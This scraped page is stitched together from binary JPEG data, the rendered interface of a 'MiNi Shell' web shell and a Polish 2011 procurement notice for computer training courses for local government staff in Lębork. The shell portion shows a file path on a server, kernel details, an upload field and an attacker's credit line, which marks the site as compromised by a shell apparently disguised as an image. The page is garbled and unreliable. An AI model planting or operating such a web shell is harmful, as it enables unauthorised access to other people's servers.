JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20110527/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20110527/133258-N-2011.html

<p class="kh_header"><b>Lębork: Zorganizowanie i przeprowadzenie szkoleń z zakresu szkoleń komputerowych</b><br>
<b>Numer ogłoszenia: 133258 - 2011; data zamieszczenia: 27.05.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Starostwo Powiatowe w Lęborku , ul. Czołgistów 5, 84-300 Lębork, woj. pomorskie, tel. 059 8632810, faks 059 8632850.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://www.powiat.leborski.samorzady.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> http://www.powiat.leborski.samorzady.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zorganizowanie i przeprowadzenie szkoleń z zakresu szkoleń komputerowych.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Głównym celem projektu jest wzmocnienie potencjału Starostwa Powiatowego w Lęborku, Urzędu Miejskiego w Lęborku, Urzędu Gminy w Nowej Wsi Lęborskiej, Urzędu Gminy w Cewicach oraz podniesienie jakości usług poprzez poprawę obsługi obywatela i podniesienie kwalifikacji zawodowych i osobistych 173 urzędniczek i urzędników w Powiecie Lęborskim w ramach projektu pn. Kadra przyszłości współfinansowanego ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego (Program Operacyjny Kapitał Ludzki, Priorytet V Dobre rządzenie, działanie 5.2. Wzmocnienie potencjału administracji samorządowej, Poddziałanie 5.2.1. Modernizacja zarządzania w administracji samorządowej).

1.	Przedmiot zamówienia 

Część I - Zorganizowanie i przeprowadzenie Szkolenia z zakresu Kursu grafiki komputerowej: Corel dla pracowników samorządowych z Powiatu Lęborskiego, w ramach projektu pn. Kadra przyszłości 

Szczegółowy opis przedmiotu zamówienia znajduje się w załączniku nr 8a do SIWZ.

Część II - Zorganizowanie i przeprowadzenie Szkolenia komputerowego - Microsoft Excel zaawansowany - dla pracowników samorządowych z Powiatu Lborskiego,  w ramach projektu pn. Kadra przyszłości

Szczegółowy opis przedmiotu zamówienia znajduje się w załączniku nr 8b do SIWZ.
 
Część III - Zorganizowanie i przeprowadzenie Szkolenia z zakresu Kursu obsługi komputera ECDL - Europejski Certyfikat Umiejętności Komputerowych - dla pracowników samorządowych z Powiatu Lęborskiego w ramach projektu pn. Kadra przyszłości

Szczegółowy opis przedmiotu zamówienia znajduje się w załączniku nr 8c do SIWZ..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.40.00.00-8, 80.50.00.00-9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.06.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa szczegółowego warunku w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa szczegółowego warunku w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa szczegółowego warunku w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający wymaga, aby Wykonawca dysponował zespołem złożonym z co najmniej 2 osób, (1 osoba  prowadząca plus 1 osoba do ewentualnego zastępstwa) które będą uczestniczyć w wykonywaniu zamówienia, posiadające stosowne uprawnienia (certyfikaty, świadectwa) potwierdzające znajomość tematyki szkolenia . W zakresie szkoleń przygotowujących do egzaminu ECDL osoby te powinny posiadać  certyfikat egzaminatora ECDL. Wszystkie osoby muszą spełnić poniższe wymaganie: 
- posiadają doświadczenie w przeprowadzeniu co najmniej 1 kursu szkolenia warsztatu o tematyce zbliżonej do przedmiotu zamówienia w okresie ostatnich 3 lat, a jeżeli okres prowadzenia działalności jest krótszy, w tym okresie.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa szczegółowego warunku w tym zakresie.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

</ul></li>
<li>
</li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>3.	W przypadku zdarzeń losowych oraz szczególnych okoliczności, których nie można było przewidzieć 
w chwili zawarcia umowy, istnieje możliwość wprowadzenia zmian do zawartej umowy w zakresie:
a)	przesunięcia terminu wykonania przedmiotu zamówienia,
b)	zmiany miejsca odbywania szkoleń kursów warsztatów
c)	zmiany osób wskazanych do przeprowadzenia szkoleń kursów warsztatów
d)	zmiany harmonogramu zajęć.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://www.powiat.leborski.samorzady.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Starostwo Powiatowe w Lęborku, ul. Czołgistów 5, 84-300 Lębork pok. nr 215.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 10.06.2011 godzina 13:00, miejsce: Biuro Obsługi Interesanta Starostwa Powiatowego w Lęborku, ul. Czołgistów 5, 84-300 Lębork.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt pn. Kadra Przyszłości współfinansowanego ze środków Unii Europejskiej 
w ramach Europejskiego Funduszu Społecznego (Program Operacyjny Kapitał Ludzki, Priorytet V Dobre rządzenie, działanie 5.2 Wzmocnienie potencjału administracji samorządowej, poddziałanie 5.2.1 Modernizacja zarządzania w administracji samorządowej..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Zorganizowanie i przeprowadzenie Szkolenia z zakresu Kursu grafiki komputerowej: Corel dla pracowników samorządowych z Powiatu Lęborskiego w ramach projektu pn. Kadra przyszłości.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Program szkolenia powinien obejmować m.in.:
1.	Zapoznanie z programem CorelDRAW
2.	Budowa okna programu
3.	Podstawy pracy z CorelDRAW
4.	Uruchomienie i zakończenie programu
5.	Tworzenie nowego rysunku
6.	Zapisanie rysunku
7.	Wczytanie rysunku
8.	Tworzenie podstawowych obiektów graficznych
9.	Pasek Przybornik
10.	Wymiarowanie
11.	Podstawowe operacje edycyjne
12.	Podstawowe narzędzia
13.	Praca na obiektach, krzywych i praca z kolorami
14.	Podstawowe przekształcenia
15.	Układ obiektów
16.	Atrybuty obiektów
17.	Warstwy
18.	Zmiana kształtów podstawowych obiektów
19.	Teksty i ich obróbka
20.	Efekty
21.	Współpraca z innymi programami
22.	Wykorzystanie filtrów graficznych
23.	Drukowanie

Liczba uczestników: 1 grupa x 20 osób 

Czas trwania szkolenia
Łączna liczba godzin szkoleniowych to 96 godzin. Na jedną godzinę zegarową składa się jedna godzina lekcyjna = 45 minut i 15 minut przerwy. 
Zajęcia będą realizowane w dni robocze dla administracji publicznej w systemie: 1 spotkanie 
w tygodniu, w godzinach od 730  do 1530  w średnio co najmniej dwutygodniowych odstępach pomiędzy kolejnymi spotkaniami. Każdy dzień szkoleniowy trwa 8 godzin.

Termin wykonania przedmiotu zamówienia
Zamawiający wymaga, aby rozpoczęcie szkolenia nastąpiło we wrześniu 2011 roku, zaś zakończenie w kwietniu 2012 roku..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.40.00.00-8, 80.50.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.04.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Zorganizowanie i przeprowadzenie  Szkolenia komputerowego - Microsoft Excel zaawansowany - dla pracowników samorządowych z Powiatu Lęborskiego w ramach projektu pn. Kadra przyszłości.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Program 16h szkolenia dla każdej grupy powinien obejmować m.in.:

1. Podstawowe operacje i czynności - przypomnienie i usystematyzowanie wiedzy
2. Formatowanie Tabel
3. Przygotowanie zestawień, ustawienia danych do tabeli
4. Formaty liczbowe, daty oraz czasu
5. Podstawowe formatowanie warunkowe
6. Formatowanie warunkowe z zastosowaniem formuł
7. Formatowanie za pomocą Dynamicznych tabel (list Excela)
8. Tworzenie pól kombi
9. Obliczenia
10.Przypomnienie i usystematyzowanie zasad adresowania w Ms Excel - względne, bezwzględne, mieszane
11.Stosowanie Nazw dla zakresów i w formułach
12.Stosowanie Funkcji logicznych, tekstowych, adresowych, czasu, finansowych, innych 
13.Bezpieczeństwo pracy w MS Excel - blokowanie dostępu do pliku za pomocą haseł, blokowanie zawartości pojedynczego arkusza z możliwością dokonywania wpisów do wybranych komórek, blokowanie struktury skoroszytu
14.Ukrywanie arkuszy i okien i odwoływanie się do komórek w ukrytych zakresach
15.Wykonywanie kalkulacji i zabezpieczanie formuł przed podglądem i przypadkową modyfikacją
16.Sprawdzanie poprawności danych
17.Pobieranie danych do list z innych lokalizacji
18.Analiza danych, bazy danych - praca z dużą ilością danych
19.Filtrowanie danych oraz zaawansowane sortowanie filtrem zaawansowanym
20.Tworzenie list sortowania w opcjach Excela
21.Sumy częściowe - dodawanie sum częściowych i zagnieżdżanie sum częściowych
22.Tworzenie wielopoziomowych podsumowań, zmiana funkcji podsumowujących
23.Kopiowanie wyników
24.Tabela przestawna, złożone tabele przestawne
25.Filtry
26.Pola wierszy, pola kolumn, pola Strony
27.Wyświetlanie wyników jako procent: kolumny, wierszy, całości
28. Zmiana funkcji podsumowujących
29.Praca z tabelami zawierającymi daty
30.Automatyczne generowanie sum dla miesięcy, kwartałów, lat
31.Konsolidacja danych: w arkuszach, z różnych plików
32. Porównanie metod konsolidacji danych
33. Metody eksportu danych do innych programów, metody importu danych do Ms Excel
34.Wykresy: tworzenie, umieszczanie i zapisywanie własnych obiektów graficznych, jako punktów wykresu, tworzenie wykresów złożonych, wstawianie obiektów z innych programów
35.Tworzenie i modyfikowanie makropoleceń za pomocą rejestratora
36.Przypisywanie makrokomend do poleceń w menu, do przycisków, do obiektów graficznych
37. Wymiana informacji pomiędzy aplikacjami pakietu MS Office, tj. importowanie danych pochodzących ze źródeł zewnętrznych, dołączanie dokumentu z pakietu Office do Excela i umieszczenie go jako części dokumentu innego programu pakietu Office, tworzenie hiperłączy
38. Korespondencja seryjna.

5. Liczba uczestników: 10 osób x 2 grupy - łącznie 20 osób

6. Czas trwania szkolenia
Łączna liczba godzin szkoleniowych to 32 godziny, w tym 16 godzin na każdą grupę szkoleniową. Na jedną godzinę zegarową składa się jedna godzina lekcyjna = 45 minut i 15 minut przerwy.
Zajęcia dla obu grup będą odbywały się dla każdej z grup w dwie soboty, po 8 godzin w każdym dniu.

7. Termin wykonania przedmiotu zamówienia
Zamawiający wymaga, aby rozpoczęcie szkolenia nastąpiło:
I grupa - czerwiec 2011, zaś termin ostatecznego zakończenia szkolenia nastąpi najpóźniej w lipcu 2011 roku.
II grupa - wrzesień 2011, natomiast termin ostatecznego zakończenia szkolenia nastąpi najpóźniej 
w październiku 2011 roku..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.40.00.00-8, 80.50.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.10.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Zorganizowanie i przeprowadzenie Szkolenia z zakresu Kursu obsługi komputera ECDL - Europejski Certyfikat Umiejętności Komputerowych - dla pracowników samorządowych z Powiatu Lęborskiego w ramach projektu pn. Kadra przyszłości.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Program 100h szkolenia dla każdej grupy powinien obejmować m.in.:

1. Podstawy technik informatycznych 
a)	przedstawienie podstawowych pojęć stosowanych w informatyce
b)	omówienie części składowych komputera i ich funkcje
c)	urządzenia wej wyj - funkcje i zasada działania
d)	nośniki pamięci - wady, zalety, przygotowanie do przechowywania danych
e)	omówienie podstawowych funkcji systemu operacyjnego
f)	przedstawienie podstawowych typów aplikacji
g)	proces powstawania systemów komputerowych
h)	omówienie podstawowych zagadnień sieciowych
i)	przedstawienie zalet i niedogodności pracy grupowej
j)	zastosowanie komputerów i sieci w życiu codziennym
k)	BHP pracy przy komputerze
l)	omówienie tematyki bezpieczeństwa danych na nośnikach oraz w sieci
m)	wprowadzenie w tematykę praw autorskich
n)	rodzaje licencji na oprogramowanie

2. Użytkowanie komputerów 
a)	prawidłowe i bezpieczne korzystanie z komputera
b)	organizacja zapisu na dyskach, pojęcie pliku i foldera
c)	obsługa aplikacji w Windows
d)	podstawowe ustawienia konfiguracyjne systemu operacyjnego
e)	zagadnienie kompresji i dekompresji plików
f)	instalowanie i odinstalowanie programów
g)	obsługa urządzeń peryferyjnych - drukarki
h)	programy antywirusowe

3. Przetwarzanie tekstów 
a)	wpisywanie i redagowanie tekstu
b)	operacje blokowe, formatowanie tekstu i akapitu
c)	wypunktowanie i numerowanie
d)	praca z kolumnami
e)	wstawianie przypisów
f)	wstawianie i formatowanie rysunków
g)	tabulatory
h)	wstawianie tabel, wykresów i diagramów
i)	praca z widokami
j)	tworzenie własnego szablonu
k)	praca ze stylami (tworzenie własnych styli, malarz formatów)
l)	praca z wieloma dokumentami
m)	ł) ustawienia strony
n)	personalizacja środowiska pracy
o)	tworzenie korespondencji seryjnej
p)	drukowanie dokumentów, określanie parametrów drukowania

4. Arkusze kalkulacyjne 
a)	pojęcia komórki i obszaru
b)	formatowanie kolumn i wierszy
c)	wykonywanie operacji na komórkach
d)	pojęcie formuły
e)	tworzenie formuł matematycznych
f)	podstawowe funkcje dostępne w MS Excel (SUMA, ŚREDNIA)
g)	śledzenie błędów
h)	tworzenie wykresów
i)	adresacja względna, bezwzględna i mieszana
j)	praca z wieloma dokumentami
k)	personalizacja środowiska pracy
l)	drukowanie arkuszy, parametry drukowania

5. Bazy danych 
a)	omówienie podstawowych pojęć związanych z bazami danych
b)	tworzenie bazy danych i tabeli
c)	modyfikacja struktury i zawartości tabel
d)	korzystanie z formularzy
e)	wybieranie informacji z bazy (filtrowanie, kwerendy)
f)	tworzenie raportów
g)	drukowanie tabel, formularzy, raportów, określanie parametrów drukowania

6. Grafika prezentacyjna 
a)	tworzenie slajdów
b)	korzystanie z kreatorów i szablonów
c)	wstawianie elementów graficznych
d)	wykorzystanie urządzeń peryferyjnych - skaner (grafika, OCR)
e)	korzystanie z animacji
f)	korzystanie z przejść slajdów
g)	opcje pokazu slajdów
h)	przypisywanie akcji poszczególnym elementom
i)	i ) personalizacja środowiska pracy
j)	wstawianie wykresów, diagramów
k)	drukowanie slajdów, określanie parametrów drukowania
l)	stworzenie projektu z wykorzystaniem poznanych technik

7. Usługi w sieciach informatycznych 
a)	podstawowe pojęcia związane z Internetem
b)	obsługa przeglądarki internetowej
c)	wyszukiwanie informacji na stronach WWW
d)	kopiowanie obiektów ze strony WWW, organizacja ulubionych
e)	drukowanie stron, określanie parametrów drukowania
f)	temat: sieć a bezpieczeństwo (wirusy, usługi związane ze zdalnymi płatnościami)
g)	podstawowe pojęcia związane z pocztą elektroniczną
h)	obsługa programu pocztowego
i)	zarządzanie skrzynką pocztową
j)	poczta elektroniczna a bezpieczeństwo - załączniki, certyfikaty, podpis elektroniczny

Egzamin zewnętrzny ECDL organizowany dla wszystkich uczestników szkolenia przez Wykonawcę  nie jest wliczany w liczbę 100h szkolenia. Miejsce szkolenia musi być dostosowane do wymagań uczestników szkolenia.

5. Liczba uczestników: 2 grupy x 10 osób - łącznie 20 osób

6. Czas trwania szkolenia
Łączna liczba godzin szkoleniowych to 200 godzin, w tym 100 godzin na 1 grupę szkoleniową. 
Na jedną godzinę zegarową składa się jedna godzina lekcyjna = 45 minut i 15 minut przerwy. Dodatkowo należy doliczyć czas trwania egzaminów zewnętrznych w ramach ECDL organizowanych dla wszystkich uczestników szkolenia przez Wykonawcę na terenie Lęborka, które nie są wliczone w liczbę 100h szkolenia.
Zajęcia będą realizowane w dni robocze dla administracji publicznej, w systemie: przeciętnie dwa spotkania w tygodniu średnio po 3 godziny, w godzinach popołudniowych, tj. od godziny 16.00.

 7. Termin wykonania przedmiotu zamówienia
Zamawiający wymaga, aby rozpoczęcie szkolenia nastąpiło dla co najmniej jednej z grup w czerwcu 2011 roku, zaś termin ostatecznego zakończenia szkolenia dla obu grup przypada najpóźniej na czerwiec 2012 roku..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.40.00.00-8, 80.50.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com